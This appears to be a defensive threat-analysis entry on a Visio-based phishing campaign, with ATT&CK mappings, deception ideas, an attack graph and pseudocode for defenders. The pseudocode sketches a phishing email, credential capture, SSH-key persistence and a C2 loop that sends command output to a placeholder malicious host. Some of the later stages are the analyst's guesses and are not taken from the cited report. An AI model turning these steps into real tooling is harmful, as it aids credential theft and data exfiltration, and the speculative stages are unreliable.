Subject: Phishing by Design – Two-Step Attacks Using Microsoft Visio Files
Tactics: TA0011 Command and Control, TA0002 Execution, TA0010 Exfiltration, TA0001 Initial Access, TA0003 Persistence
Technique: T1071.001 Application Layer Protocol: Web Protocols, T1059 Command and Scripting Interpreter, T1543 Create or Modify System Process, T1041 Exfiltration Over C2 Channel, T1566.001 Phishing: Spearphishing Attachment
Procedure:
- Initial Access: Attackers compromise a legitimate email account and send phishing emails containing a malicious URL, either directly in the email body or within an attached .eml file. The email often impersonates a trusted entity and may include branding to appear legitimate. The URL leads to a compromised SharePoint page hosting a weaponized Visio (.vsdx) file.
- Execution: The Visio file contains a malicious URL hidden behind a clickable element, such as a “View Document” button. Victims are instructed to hold down the Ctrl key while clicking the element to access the URL, a technique designed to evade automated security scanners. This URL redirects the victim to a fake Microsoft login page designed to steal credentials.
- Persistence (Implied): Although not explicitly mentioned in the document, attackers likely leverage the stolen credentials for persistent access to the victim’s environment. This may involve establishing backdoors, creating new accounts, or modifying existing ones.
- Command and Control: After gaining access, attackers likely establish a command-and-control (C2) channel using application layer protocols like HTTP to communicate with the compromised system, issue commands, and manage the attack.
- Exfiltration: Attackers exfiltrate sensitive data from the victim’s environment over the established C2 channel.
Vulnerability: EAV0003 When adversaries exploit a trusted relationship, such as using an account to access or move in the environment, they are vulnerable to triggering tripwires or engaging in anomalous behavior.
Engagement Opportunity:
- User Education and Training: Conduct security awareness training focused on identifying phishing emails, recognizing suspicious links and attachments, and understanding the risks of two-step attacks.
- Network Monitoring and Threat Intelligence: Enhance network monitoring capabilities to detect suspicious traffic patterns associated with C2 communication and data exfiltration. Leverage threat intelligence to identify known malicious URLs and block access to compromised SharePoint sites.
- Deception Technology: Deploy deception assets, such as decoy files or fake login pages, to lure attackers and gather intelligence on their tools, techniques, and objectives
Threat Actor: Unknown, potentially sophisticated and organized group targeting multiple organizations.
Threat Objective:
Credential theft, data exfiltration, potential financial gain or espionage.
Deception Opportunity:
- Credential Decoys: Create fake login pages mimicking Microsoft 365 or other commonly used services to capture stolen credentials and track attacker activity.
- Data Decoys: Plant decoy files containing false but seemingly valuable information to lure attackers and gather intelligence on their exfiltration methods and objectives.
- Honeypots: Deploy honeypots mimicking critical systems or sensitive data repositories to attract attackers and observe their behavior in a controlled environment.
Sensor Data Placement: User-Mode
Observable Level: Core to Some Implementations of (Sub-)Technique
Scoring Rationale:
Link to Report: https://perception-point.io/blog/phishing-by-design-two-step-attacks-using-microsoft-visio-files/
Link to Report II.:
Additional Comments:
- Observable Level:
- Spearphishing Attachment: Core to Adversary-Brought Tool (The specific Visio file and embedded URLs are unique to this campaign)
- Command and Scripting Interpreter: Core to Pre-Existing Tool (Attackers leverage built-in Windows tools)
- Scheduled Task/Job: Core to Some Implementations of (Sub-)Technique (Scheduled tasks are a common persistence method, but not all attackers use them)
- Application Layer Protocol: Core to Adversary-Brought Tool (Specific C2 protocols and infrastructure are unique to the attacker)
- Exfiltration Over C2 Channel: Core to Sub-Technique or Technique (Exfiltration over C2 is fundamental to this data exfiltration method)
- Scoring Rationale: The scoring reflects the attacker’s use of both unique tools (Visio file, C2 infrastructure) and pre-existing system features (Windows tools). The observable levels vary based on how closely tied the observables are to the specific attacker tools and techniques.
Possible elements:
MSG (Pseudocode):
# Malicious Sub-Graph Standard
# Node Format:
# [Node ID]: [Tactic] – [Technique] – [Procedure] ([Observable Level])
# Edge Format:
# [Source Node ID] –> [Destination Node ID] ([Exploited Vulnerability])
# Example: Visio Phishing Attack Graph
[1]: Initial Access – T1566: Spearphishing Attachment – Email with malicious URL leading to Visio file on SharePoint (Core to Adversary-Brought Tool)
[2]: Execution – T1059: Command and Scripting Interpreter – User clicks “View Document” in Visio file while holding Ctrl, opening malicious URL (Core to Pre-Existing Tool)
[3]: Persistence – T1543: Create or Modify System Process – Establish persistence using stolen credentials (Implied, Core to Some Implementations of (Sub-)Technique)
[4]: Command and Control – T1071: Application Layer Protocol – Communicate with C2 server using HTTP (Core to Adversary-Brought Tool)
[5]: Exfiltration – T1041: Exfiltration Over C2 Channel – Exfiltrate data over HTTP C2 channel (Core to Sub-Technique or Technique)
1 –> 2 (Lack of User Awareness)
2 –> 3 (Exploitation of Legitimate Services)
3 –> 4 (Lack of Network Monitoring)
4 –> 5 (Lack of Network Monitoring)
# Pseudocode Standard
# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]
# Example: Visio Phishing Attack Pseudocode
function Initial_Access_T1566_Spearphishing_Attachment(target_email):
# Craft phishing email with malicious URL to Visio file on SharePoint
email_body = “””
Dear [Target Name],
Please review the attached document at your earliest convenience.
Thanks,
[Sender Name]
“””
attachment = VisioFile(malicious_URL=”https://[malicious_sharepoint]/[malicious_visio_file].vsdx”)
send_email(target_email, email_body, attachment)
return malicious_URL
function Execution_T1059_Command_and_Scripting_Interpreter(malicious_URL):
# User clicks “View Document” in Visio file while holding Ctrl
# Browser opens malicious_URL (this step is user-driven)
# Malicious URL redirects to fake login page
display_fake_login_page(microsoft_theme=True)
credentials = capture_credentials()
return credentials
function Persistence_T1543_Create_or_Modify_System_Process(credentials):
# Use credentials to establish persistence (Implied)
# This could involve creating new user accounts, adding SSH keys, etc.
if credentials.type == “ssh”:
add_ssh_key(credentials.username, credentials.key)
elif credentials.type == “user_account”:
create_user(credentials.username, credentials.password)
return C2_communication_module
function Command_and_Control_T1071_Application_Layer_Protocol(C2_communication_module):
# Establish HTTP connection with C2 server
C2_server = “https://[malicious_domain]”
establish_connection(C2_server)
# Receive commands and exfiltrate data
while True:
command = receive_command(C2_server)
result = execute_command(command)
send_data(C2_server, result)
return “C2 communication established and ongoing”
function Exfiltration_T1041_Exfiltration_Over_C2_Channel(exfiltrated_data):
# Exfiltration is handled within the C2 communication loop
return “Exfiltration successful”